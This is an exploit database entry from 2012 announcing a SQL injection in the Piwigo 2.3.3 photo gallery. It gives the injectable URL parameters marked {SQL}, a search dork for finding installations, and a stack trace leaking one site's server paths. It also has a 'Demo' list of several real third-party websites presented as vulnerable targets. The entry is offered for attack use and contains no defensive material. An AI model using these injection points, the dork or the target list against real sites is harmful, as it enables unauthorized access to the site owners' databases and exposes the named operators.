piwigo v.2.3.3 SQL Injector

2012-03-04T00:00:00
ID 1337DAY-ID-17618
Type zdt
Reporter TeaM MosTa
Modified 2012-03-04T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            +--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : piwigo <== SQL Injector
# Date          : 26-02-2012
# Author        : TeaM MosTa
# Version       : 2.3.3
# Dork          : "Propulsé par Piwigo"
# Tested on     : Window 7 , B-T.5
# Greetz        : milw0rm 1337day.com
+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[ Exploit by TeaM MosTa ]--------------------------------------------------+
Exploit
http://127.0.0.1/piwigo/index.php?/category/1" <===> {SQL}
comments.php?display_mode=albums  <===> {SQL}
#1    my_error /home/fanslyon/public_html/piwigo/include/functions.inc.php(637)
#2    pwg_query /home/fanslyon/public_html/piwigo/include/functions.inc.php(1275)
#3    hash_from_query /home/fanslyon/public_html/piwigo/include/functions_category.inc.php(393)
#4    get_cat_id_from_permalinks /home/fanslyon/public_html/piwigo/include/functions_url.inc.php(483)
#5    parse_section_url /home/fanslyon/public_html/piwigo/include/section_init.inc.php(123)
#6    include /home/fanslyon/public_html/piwigo/index.php(27)
Demo :
http://www.fanslyon.com/piwigo/index.php?/category/53' {SQL}
http://endlersman.paysages-aquatiques.com/archivphoto/piwigo/picture.php?/194/categories%22{SQL}
http://endlersman.paysages-aquatiques.com/archivphoto/piwigo/index.php?/category/53%27{SQL}
http://88.191.128.71/piwigo/piwigo/picture.php?/194/categories%22{SQL}
http://photos.ugtg.org/picture.php?/194/categories%22{SQL}
http://www.nature-granville-chausey.com/picture.php?/40/category/4%22
http://tedybear.fr/piwigo/index.php?/category/194%22

+----------------------------------------------------------------------------------------------------------------------------------+
TnKs To :
[# Ked Ans | 1337day.com Inj3ct0r Exploit DataBase | Original MosTa | TrOoN | HacKer_Fire |#]
[# Kàràm Eddiñé BiLàmi | security-ray | Exploit-Db | metasploit | backtrack| walid_rires|#]
[#Mail: [email protected] #]



#  0day.today [2018-03-13]  #